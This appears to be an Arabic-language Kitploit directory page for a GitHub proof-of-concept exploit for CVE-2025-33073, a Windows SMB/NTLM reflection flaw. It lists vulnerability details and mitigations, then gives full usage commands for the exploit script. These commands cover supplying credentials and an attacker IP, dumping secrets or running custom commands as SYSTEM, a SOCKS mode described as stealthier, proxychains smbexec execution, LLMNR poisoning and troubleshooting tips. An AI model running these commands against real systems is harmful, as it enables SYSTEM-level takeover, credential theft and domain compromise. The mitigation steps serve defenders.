Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Blackash-CVE-2025-33073 — CVE-2025-33073 | Kitploit
أدوات/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
تحليل الثغرات الأمنيةالاستغلالالحركة الجانبيةاختبار الاختراقالقيادة والسيطرةالفريق الأحمرتطوير الحمولات
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

عرض المستودع
16منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

✨ CVE-2025-33073: ثغرة RCE في SMB لويندوز 🚨

🔥 تنفيذ عن بُعد عالي الخطورة (مُصدّق عليه) 🔥 التحكم غير السليم في الوصول في عميل SMB لويندوز (CWE-284)


🛡️ تفاصيل رئيسية في لمحة

تنزيل الأداة
الجانبالتفاصيل
درجة CVSS v3.18.8 (عالية) 🔥
الأنظمة المتأثرةويندوز 10، 11، سيرفر 2012–2025 (جميع الإصدارات) 💻
تاريخ الكشف10 يونيو 2025 📅 (تم التصحيح في ترقيع الثلاثاء لشهر يونيو 2025)
الاستغلالمُستغل بنشاط في البرية 😱
أُضيف إلى قائمة CISA KEV في 21 أكتوبر 2025
ناقل الهجومشبكة (مُصدّق عليه) 🌐
التأثيرتنفيذ تعليمات برمجية على مستوى SYSTEM 👑
حركة جانبية عبر ترحيل Kerberos
التجاوزتخفيفات انعكاس NTLM ⚡

🛠️ التخفيفات الفورية

  1. ثبّت الترقيع الآن! 🔧
    → طبق تحديثات مايكروسوفت (مثل KB5060998)
    → دليل تحديث مايكروسوفت 🔗

  2. فعّل توقيع SMB ✍️
    → فرضه على جميع العملاء والخوادم
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. قيّد NTLM 🚫
    → احظر NTLM حيثما أمكن
    → راقب محاولات الترحيل باستخدام أدوات EDR

  4. إصلاح آلي؟ 🤖
    → استخدم Vicarius vRx أو نصوص برمجية مخصصة للتصحيح الجماعي


⚠️ لماذا يهم الأمر

  • يتجاوز حماية NTLM التقليدية 🛑
  • يعمل حتى إذا كان توقيع SMB غير مفروض
  • يمكّن من السيطرة الكاملة على المجال في بيئات Active Directory غير المُهيأة بشكل صحيح 🏰

الحالة اعتبارًا من 15 نوفمبر 2025:
✅ مُصحّح
❌ لا يزال مُستغلًا في الأنظمة غير المُصحّحة
🔔 الموعد النهائي لـ CISA: 10 نوفمبر 2025 ⏰


⚠️ مثال استخدام

واجهة رسومية (GUI)

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

سطر أوامر (CLI)

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

أمر مخصص بدلاً من تشغيل secretsdump يمكن تنفيذ أمر مخصص.

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS لتنفيذ أوامر بشكل أكثر تمويهاً بعد إنشاء اتصال صالح كـ SYSTEM. يجب أن يكون --target و --target-ip متساويين هنا.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

أيضًا يمكن تشغيل أمر مخصص عبر proxychains بدلاً من تفريغ SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

استغلال يدوي دون الحاجة إلى DNS

إذا كنت في نفس مجال البث (broadcast domain) للجهاز وكان عرضة لتسميم LLMNR، فيمكن استغلال جهاز دون الحاجة إلى تسجيل سجل DNS.

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

استكشاف الأخطاء وإصلاحها:

  • لقد لاحظت أحيانًا أن الهجوم لا يعمل لأن اسم المضيف يُستخدم في الهجوم مما يؤدي إلى بحث DNS من Kali. إذا كان Kali لا يستخدم خادم DNS أو حصلت على رسالة '/ FAILED' من impacket-ntlmrelayx، فجرب إضافة المضيف إلى ملف /etc/hosts. من المفترض أن يؤدي ذلك إلى نجاح الهجوم.

  • إذا كنت تستخدم IP، فيجب أن يعمل الهجوم. أحيانًا يؤدي تشغيله عدة مرات إلى نجاح بدلاً من فشل. ليس من الواضح تمامًا حتى الآن سبب حدوث ذلك. أعتقد أنه يتعلق بالشبكة.

  • جرب طريقة إكراه أخرى باستخدام -M أو --method.


Wireshark:

مصادقة NTLM المحلية تحدث

455252866-0a3fe643-2d52-427a-91f2-991770732f62

مصادقة NTLM المحلية لا تحدث مما يؤدي إلى محاولة فاشلة

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

معلومة مفيدة:

  • يتيح xterm النسخ واللصق باستخدام زر الفأرة الأوسط.
  • يجب أن يكون سجل DNS معروفًا أيضًا للعميل، وقد يستغرق ذلك وقتًا أطول في بعض الحالات. أعني بوقت أطول بضع دقائق.
  • هذا مجرد دليل إثبات (PoC) مما يعني أنه لم يتم محاولة تجاوز برامج مكافحة الفيروسات / EDR. استخدم على مسؤوليتك الخاصة.

لا تنتظر — ثبّت الترقيع اليوم! 🛑
أمان شبكتك يعتمد عليه. 💪